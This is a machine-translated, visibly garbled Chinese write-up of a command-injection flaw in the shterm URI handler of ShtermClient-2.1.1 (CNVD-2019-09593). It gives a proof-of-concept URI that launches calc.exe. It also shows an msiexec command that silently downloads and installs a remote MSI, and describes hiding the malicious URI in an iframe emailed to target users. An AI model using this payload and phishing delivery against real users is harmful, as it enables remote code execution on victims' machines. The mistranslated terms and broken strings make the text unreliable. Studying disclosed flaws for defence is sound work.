一.基本信息
参考: https://www.cn VD.org.cn/flaw/show/1559039
修补程序信息:此漏洞修复修补程序于2019年4月1日发布。 如果客户尚未修改补丁,可以联系齐治科技技术支持以获得具体支持。
二.挖坑进程
这是我第一次接触运行时的Bao运行,用Bao运行登录目标服务器/APP就像是在本地直接打开的一样,我感到很不可思议。
1、挖掘过程
首先,安装齐治运维堡机客户端软件ShtermClient后,在计算机上注册虚拟协议“shterm”。 汉堡机通过这个协议,打开了调用本地程序连接汉堡机的通道。 下图是chrome浏览器打开链接的提示。
在注册表中。 Command的子代显示了如何处理shterm协议的URI。
分析该过程后发现,将“app”:”mstsc”改为“app”:”calc”后,生成的shterm URI可以打开本地计算机。 原以为命令只能注入app参数,但使用Procmon.exe监视LoadShell.exe的运行时,会在%tmp%目录下生成几个日志文件,通过分析日志文件和多次测试
Client/inflate.php源代码表示只压缩服务器发送的数据,并在base64编码后输出。
2、漏洞验证
如果使用的是存在漏洞的shtermclient,则在浏览器中打开以下链接会以本地方式打开计算器calc.exe :
sh term ://ejyrvkoskfcyukpozelwqguaif8ejw==
三.脆弱性的利用
1、建立测试环境
首先在靶机上安装ShtermClient-2.1.1。
然后在kali上构建PHP环境并生成shterm URI,如下图所示。
在靶机的浏览器上打开链接,就会出现计算器。
2、输出
发出此POST请求时,生成的shterm URI将执行命令,如下图所示。
msiexec.exe/q/n/I https://github.com/Yasushi/putty/archive/master.MSI
然后,将shterm URI放入iframe中,通过邮件或其他方法将该html页面的地址发送给目标用户,从而达到不可告人的目的。
demo demo齐治堡垒机ShtermClient-2.1.1命令执行漏洞(CNVD-2019-09593 ) Hacked by StudyCat